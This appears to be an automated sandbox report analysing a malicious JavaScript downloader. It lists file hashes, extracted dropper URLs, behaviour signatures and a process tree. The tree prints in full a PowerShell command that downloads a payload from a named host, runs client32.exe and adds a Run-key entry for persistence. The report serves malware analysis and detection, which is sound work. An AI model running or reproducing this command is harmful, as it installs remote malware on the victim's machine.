Analysis
-
max time kernel
119s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20230712-en -
resource tags
arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system -
submitted
29/08/2023, 08:27
Static task
static1
Behavioral task
behavioral1
Sample
232123212321.js
Resource
win7-20230712-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
232123212321.js
Resource
win10v2004-20230703-en
10 signatures
150 seconds
General
-
Target
232123212321.js
-
Size
3KB
-
MD5
55b69c07b1ba60eb1dd5f602a503c8a8
-
SHA1
f52c545c39628c813234d509a6a52decdf320464
-
SHA256
08e4dadf294dad1072e37c8979e394055ce176c940e36f47895c2929efb24125
-
SHA512
2f30c9cac5d4e0de019fd03e4cee935baf5d1d048923215d5a53e96028a675c4ddcf0f3e3e9ad8942d0c2118fc5659f23b9b20295e00185af73c1fe6ef576673
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://instalfrio.cl/destination.txt
exe.dropper
http://instalfrio.cl/destination.txt
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 2124 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2124 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2124 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1516 wrote to memory of 2124 1516 wscript.exe 28 PID 1516 wrote to memory of 2124 1516 wscript.exe 28 PID 1516 wrote to memory of 2124 1516 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\232123212321.js1⤵
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C "$u='http://instalfrio.cl/destination.txt';$6=(New-Object System.Net.WebClient).DownloadString($u);$a=[System.Convert]::FromBase64String($6);$d=[System.Environment]::GetFolderPath('ApplicationData')+'\D';if (!(Test-Path $d -PathType Container)) { New-Item -Path $d -ItemType Directory };$p=Join-Path $d 'p.zip';[System.IO.File]::WriteAllBytes($p,$a);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$d)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $d 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$s=$d+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='X';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2124
-